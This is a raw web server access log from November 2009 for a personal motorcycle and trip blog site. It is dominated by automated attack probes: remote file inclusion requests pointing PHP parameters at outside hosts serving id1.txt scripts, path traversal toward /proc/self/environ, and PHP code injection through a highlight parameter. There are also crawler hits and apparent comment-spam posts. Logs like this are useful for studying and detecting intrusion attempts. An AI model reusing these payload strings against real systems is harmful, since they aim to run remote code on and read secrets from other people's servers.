203.234.62.129 - - [20/Nov/2009:10:08:37 -0800] "GET /logs/access_081220.log//index.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
82.41.129.203 - - [20/Nov/2009:10:09:07 -0800] "GET /logs/access_090809.log/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.denengeldiest.be/pictures/Events/Kajakken/id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
70.85.112.138 - - [20/Nov/2009:10:10:09 -0800] "GET /index.php?body=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 16306 "-" "-" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:10:36 -0800] "GET /logs/access_080109.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:10:36 -0800] "GET /logs/access_080503.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.64.223.41 - - [20/Nov/2009:10:10:38 -0800] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:11:16 -0800] "GET /logs/access_090510.log%20%20////?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:11:17 -0800] "GET /logs/access_090510.log%20%20////?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:11:17 -0800] "GET /logs////?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 126793 "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:11:17 -0800] "GET /logs////?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 126793 "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:11:17 -0800] "GET ///?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.0" 200 15926 "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:11:17 -0800] "GET ///?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 15941 "-" "Mozilla/5.0" "www.dmulk.com"
79.64.223.41 - - [20/Nov/2009:10:11:18 -0800] "GET /logs/access_080828.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:11:38 -0800] "GET /logs/access_090511.log%20%20////?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:11:49 -0800] "GET /logs/access_090511.log%20%20////?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/Nov/2009:10:11:53 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
85.15.219.153 - - [20/Nov/2009:10:11:54 -0800] "GET /blog/index.php/2009/04/05/yuma-proving-grounds-122908-123108/ HTTP/1.0" 200 20983 "http://dmulk.com/blog/2009/04/05/yuma-proving-grounds-122908-123108/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "dmulk.com"
85.15.219.153 - - [20/Nov/2009:10:11:56 -0800] "POST /blog/wp-comments-post.php HTTP/1.0" 302 1 "http://dmulk.com/blog/2009/04/05/yuma-proving-grounds-122908-123108/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "dmulk.com"
85.15.219.153 - - [20/Nov/2009:10:11:58 -0800] "GET /blog/index.php/2009/04/05/yuma-proving-grounds-122908-123108/comment-page-1/ HTTP/1.0" 200 21059 "http://dmulk.com/blog/2009/04/05/yuma-proving-grounds-122908-123108/comment-page-1/#comment-1286" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "dmulk.com"
61.100.181.217 - - [20/Nov/2009:10:12:04 -0800] "GET /admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:10:12:04 -0800] "GET /logs/access_090912.log/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:10:12:04 -0800] "GET /logs/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.200 - - [20/Nov/2009:10:13:06 -0800] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/131.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
61.100.181.217 - - [20/Nov/2009:10:13:59 -0800] "GET /logs/access_080512.log/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:14:55 -0800] "GET /includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:14:55 -0800] "GET /logs/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:14:55 -0800] "GET /logs/access_080109.log%20%20/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:14:55 -0800] "GET /logs/access_080503.log%20%20/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [20/Nov/2009:10:15:11 -0800] "GET /logs/access_090912.log%20%20/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:15:58 -0800] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.234.200.104 - - [20/Nov/2009:10:16:59 -0800] "GET /ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.104 - - [20/Nov/2009:10:16:59 -0800] "GET /logs/access_090303.log/ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.104 - - [20/Nov/2009:10:16:59 -0800] "GET /logs/access_090316.log/ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.104 - - [20/Nov/2009:10:17:00 -0800] "GET /ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.104 - - [20/Nov/2009:10:17:00 -0800] "GET /logs/access_090303.log/ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.104 - - [20/Nov/2009:10:17:00 -0800] "GET /logs/access_090316.log/ckshop.php?incdir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:38 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:38 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:38 -0800] "GET /logs//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:38 -0800] "GET /logs//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:39 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:17:39 -0800] "GET /logs/access_070905.log HTTP/1.0" 200 42196 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:39 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:41 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:41 -0800] "GET /logs//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:41 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:52 -0800] "GET /logs/access_090216.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:54 -0800] "GET /logs/access_090216.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:10:17:57 -0800] "GET /logs/access_090216.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:10:18:40 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:10:18:40 -0800] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:10:18:43 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 200 8159 "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:18:43 -0800] "GET /includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:18:43 -0800] "GET /logs/access_080109.log%20%20/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:18:43 -0800] "GET /logs/access_080503.log%20%20/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:18:43 -0800] "GET /logs/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:10:18:44 -0800] "GET /logs/access_090821.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:10:18:59 -0800] "GET /logs/access_080512.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:10:19:03 -0800] "GET /logs/access_090821.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.200 - - [20/Nov/2009:10:19:04 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_056.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
190.95.231.98 - - [20/Nov/2009:10:19:55 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:10:19:55 -0800] "GET /logs/access_090226.log/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:10:19:56 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:10:19:56 -0800] "GET /logs/access_090604.log/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.233.89.196 - - [20/Nov/2009:10:19:56 -0800] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.233.89.196 - - [20/Nov/2009:10:19:56 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.233.89.196 - - [20/Nov/2009:10:19:58 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 200 8175 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.89.196 - - [20/Nov/2009:10:20:02 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.233.89.196 - - [20/Nov/2009:10:20:02 -0800] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.233.89.196 - - [20/Nov/2009:10:20:02 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 200 8175 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.89.196 - - [20/Nov/2009:10:20:08 -0800] "GET /logs/access_090821.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.233.89.196 - - [20/Nov/2009:10:20:12 -0800] "GET /logs/access_090821.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:20:28 -0800] "GET /logs/access_080109.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:20:28 -0800] "GET /logs/access_080503.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:20:38 -0800] "GET /logs/access_090604.log/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:10:20:38 -0800] "GET /logs/access_090226.log/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.235.107.21 - - [20/Nov/2009:10:20:50 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.0" 200 14683 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "dmulk.com"
212.235.107.21 - - [20/Nov/2009:10:20:52 -0800] "POST /blog/wp-comments-post.php HTTP/1.0" 302 1 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "dmulk.com"
212.235.107.21 - - [20/Nov/2009:10:20:53 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/comment-page-1/ HTTP/1.0" 200 14739 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/comment-page-1/#comment-1287" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:21:59 -0800] "GET /logs/access_080503.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:21:59 -0800] "GET /logs/access_080109.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:10:23:51 -0800] "GET /logs/access_090604.log/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:10:23:51 -0800] "GET /logs/access_090226.log/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:24:30 -0800] "GET /logs/access_070911.log HTTP/1.0" 200 86699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:45 -0800] "GET //naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:45 -0800] "GET //naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:47 -0800] "GET //naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:47 -0800] "GET //naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:49 -0800] "GET /logs/access_090302.log%20%20///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:49 -0800] "GET /logs///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:49 -0800] "GET /logs/access_090525.log%20%20///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:49 -0800] "GET /logs/access_090302.log%20%20///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:49 -0800] "GET /logs///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:49 -0800] "GET /logs/access_090525.log%20%20///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:51 -0800] "GET /logs/access_090302.log///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:51 -0800] "GET /logs///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:51 -0800] "GET /logs/access_090525.log///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:52 -0800] "GET /logs///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:52 -0800] "GET /logs/access_090302.log///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:24:52 -0800] "GET /logs/access_090525.log///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:25:02 -0800] "GET /index.php?body=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 16306 "-" "-" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:25:43 -0800] "GET /logs/access_090302.log///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:25:43 -0800] "GET //naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:25:43 -0800] "GET /logs///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:25:43 -0800] "GET /logs/access_090302.log///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:25:43 -0800] "GET //naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:25:43 -0800] "GET /logs///naboard_pnr.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
